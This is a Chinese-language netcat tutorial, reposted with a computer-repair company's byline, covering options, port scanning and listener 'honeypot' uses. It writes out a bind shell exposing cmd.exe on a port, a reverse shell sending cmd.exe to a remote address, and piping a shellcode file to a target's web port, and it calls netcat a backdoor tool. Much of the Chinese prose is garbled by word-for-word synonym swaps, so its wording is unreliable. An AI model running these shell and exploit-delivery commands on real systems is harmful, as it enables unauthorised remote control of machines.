经典好文:nc的说明及使用
整理人:demonalex
email:demonalex_at_dark2s.org
参考材料:步伐原创者Hobbit与Chris Wysopal的说明文档、G-python、黑猫警长、Quack、zhoutree等各位高手的文章
netcat被誉为网络宁静界的‘瑞士军刀',信赖没有什么人不了解它吧......
一个简单而有用的工具,透过利用TCP或UDP协议的网络毗连去读写数据。它被计划成一个稳固的后门工具,
可以或许直接由其它步伐和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,可以或许创建你需要的几
乎所有类型的网络毗连,还有几个很有意思的内置功能(概况请看上面的利用方法)。
在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑'编译
后的新‘稀释'版。‘稀释'版的主步伐只有10多KB(10多KB的NC是不克不及完成上面所说的第4、第5种利用方法,
有此功能的原版NC好象要60KB:P),虽然"体积"小,但很完成许多事情。
=====================================================================================================
软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]
=====================================================================================================
参数介绍:
'nc.exe -h'即可看到各参数的利用方法。
根本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 步伐重定向,一旦毗连,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 资助信息
-i secs 延时的间隔
-l 监听模式,用于入站毗连
-L 毗连关闭后,仍然连续监听
-n 指定命字的IP地点,不克不及用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及长途端口
-s addr 本地源地点
-t 利用TELNET交互方法
-u UDP模式
-v 详细输入--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输入关掉--用于扫描时
端口的表现方法可写为M-N的范围格式。
=====================================================================================================
根本用法:
大约有以下几种用法:
1)毗连到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描长途主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向毗连,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向毗连到192.168.x.x的TCP5354端口
以上为最根本的几种用法(实在NC的用法还有许多,
当配合管道下令"|"与重定向下令"<"、">"等等下令功能更强大......)。
=====================================================================================================
高级用法:
6)作攻击步伐用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
讲解:毗连到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的结果,
真是有异曲同工之妙:P)
附:'c:\exploit.txt'为shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:利用'-L'(细致L是大写)可以不绝地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:\log.txt
讲解:利用'-L'可以不绝地监听某一个端口,直到ctrl+c为止,同时把结果输入到'c:\log.txt'中,如果把‘>'
改为‘>>'即可以追加日志
附:'c:\log.txt'为日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:\honeypot.txt
格式2:type.exe c:\honeypot.txt|nc -L -p 80
讲解:利用'-L'可以不绝地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容‘送'入其
管道中
附:'c:\honeypot.txt'为诱骗数据等
=====================================================================================================
自己水平无限,希望各位高手多多指教,接待写信到demonalex@dark2s.org与偶讨论,谢谢:)
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|